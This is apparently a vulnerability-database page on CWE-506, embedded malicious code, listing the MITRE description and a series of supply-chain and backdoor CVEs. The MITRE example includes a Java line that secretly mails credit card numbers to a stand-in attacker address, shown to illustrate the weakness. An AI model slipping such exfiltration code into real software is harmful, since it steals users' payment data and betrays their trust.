Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1336 CNY

100%

CWE-506 (内嵌的恶意代码) — Vulnerability Class 97

97 vulnerabilities classified as CWE-506 (内嵌的恶意代码). AI Chinese analysis included.

CWE-506 represents a critical integrity weakness where software contains intentionally embedded malicious code, often disguised as legitimate functionality. This flaw typically manifests as Trojan horses, trapdoors, or logic bombs, allowing developers or insiders to subvert system security at a predetermined time or under specific conditions. Exploitation occurs when the hidden code executes, granting unauthorized access, stealing data, or disrupting operations while the primary application appears to function normally. To mitigate this risk, organizations must enforce strict code review processes and utilize automated static analysis tools to detect suspicious patterns. Additionally, implementing robust access controls and maintaining transparent development practices ensure that no hidden backdoors remain in the final product, thereby preserving trust and preventing insider threats from compromising system integrity.

MITRE CWE Description
The product contains code that appears to be malicious in nature. Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of a product or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend.
Common Consequences (1)
Confidentiality, Integrity, Availability Execute Unauthorized Code or Commands
Mitigations (1)
Implementation, Operation Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.
Examples (1)
In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.
boolean authorizeCard(String ccn) { // Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); }
Bad · Java
CVE ID Title CVSS Severity Published
CVE-2026-77651 arrayref 0.3.10 依赖注入致Rust项目代码执行 — arrayref 9.8 Critical 2026-08-21
CVE-2026-77650 Rust append-only-vec 0.1.9依赖注入致远程代码执行 — append-only-vec 9.8 Critical 2026-08-21
CVE-2026-77649 Internment crate 0.8.7 Rust远程代码执行漏洞 — internment 9.8 Critical 2026-08-21
CVE-2026-73532 Fluent Forms Pro 6.2.7 Embedded Malicious Code via Tampered Plugin Build — Fluent Forms Pro 9.8 Critical 2026-08-13
CVE-2026-73533 Ninja Tables Pro 5.2.11 Embedded Malicious Code via Tampered Plugin Build — Ninja Tables Pro 9.8 Critical 2026-08-13
CVE-2026-48161 react18-use was vulnerable to malicious code execution via compromised commits — react18-use 9.3 Critical 2026-08-10
CVE-2026-48160 react-tracked was vulnerable to malicious code execution via compromised commits — react-tracked 9.3 Critical 2026-08-10
CVE-2026-48159 use-reducer-async was vulnerable to malicious code execution via compromised commits — use-reducer-async 9.3 Critical 2026-08-10
CVE-2026-48158 use-context-selector was vulnerable to malicious code execution via compromised commits — use-context-selector 9.3 Critical 2026-08-10
CVE-2026-66747 ENDLESSDOORS: Zbtlink Router rctl/kworker Phone-Home Root Implant — CPE2801 Firmware 9.8 Critical 2026-08-05
CVE-2026-67595 VaahCMS 2.0.0 - 2.3.4 Malicious JavaScript Supply Chain via security-otp.blade.php — vaahcms 8.1 High 2026-07-29
CVE-2026-18072 Advanced Responsive Video Embedder for Rumble, Odysee, YouTube, Vimeo, Kick … 10.8.7 - Unauthenticated Authentication Bypass via Hardcoded Backdoor in '_wplogin' Parameter — Advanced Responsive Video Embedder for Rumble, Odysee, YouTube, Vimeo, Kick … 9.8 Critical 2026-07-29
CVE-2026-46412 Malicious code in @beproduct/nestjs-auth (0.1.2 through 0.1.19) — Mini Shai-Hulud worm — beproduct-org-nestjs-auth 10.0 Critical 2026-07-20
CVE-2026-46421 Supply chain compromise via malicious package versions (@cap-js/sqlite, @cap-js/postgres, @cap-js/db-service) — @cap-js/sqlite - - 2026-07-15
CVE-2026-45758 Malicious code in guardrails-ai 0.10.1 (supply chain compromise) — guardrails 9.6 Critical 2026-06-05
CVE-2026-48027 Compromised Nx Console version 18.95.0 — nx-console 9.3 Critical 2026-05-27
CVE-2026-8398 Disc Soft DAEMON Tools Lite 安全漏洞 — DAEMON Tools Lite 9.8 Critical 2026-05-15
CVE-2026-44484 Compromise of PyTorch Lightning PyPi Package Versions — pytorch-lightning - - 2026-05-14
CVE-2026-45321 Malware in 42 @tanstack/* packages exfiltrates cloud credentials, GitHub tokens, and SSH keys — arktype-adapter 9.6 Critical 2026-05-12
CVE-2026-6443 Essentialplugin Plugins (Various Versions) - Injected Backdoor — Accordion and Accordion Slider 9.8 Critical 2026-04-17
CVE-2026-34424 Smart Slider 3 Pro 3.5.1.35 Supply Chain Attack Remote Access Toolkit — Smart Slider 3 Pro for WordPress 9.8 Critical 2026-04-09
CVE-2026-33634 Trivy ecosystem supply chain briefly compromised — setup-trivy 7.4 - 2026-03-23
CVE-2026-31976 xygeni-action v5 tag poisoned with C2 backdoor — xygeni-action 8.8AI High AI 2026-03-11
CVE-2026-28353 Trivy Vulnerability Scanner: Unauthorized AI Agent Execution Code Included in OpenVSX Extension Release — trivy-vscode-extension 5.5 - 2026-03-05
CVE-2024-10938 OVRI Payment 1.7.0 - Malicious .htaccess directive — OVRI Payment 6.5 Medium 2026-02-27
CVE-2025-59374 ASUS Live Update 安全漏洞 — live update 8.1AI High AI 2025-12-17
CVE-2018-25117 VestaCP Debian Installer Malicious Backdoor Supply Chain Compromise — Control Panel (CP) 8.8AI High AI 2025-10-15
CVE-2017-20203 NetSarang v5.0 Malicious Backdoor Supply Chain Compromise — Xmanager Enterprise 10.0AI Critical AI 2025-10-09
CVE-2017-20202 Web Developer for Chrome v0.4.9 Malicious Backdoor Supply Chain Compromise — Web Developer for Chrome 8.8AI High AI 2025-10-08
CVE-2017-20201 CCleaner v5.33.6162 & CCleaner Cloud v1.07.3191 Malicious Backdoor Supply Chain Compromise — CCleaner 9.8AI Critical AI 2025-10-08

Vulnerabilities classified as CWE-506 (内嵌的恶意代码) represent 97 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.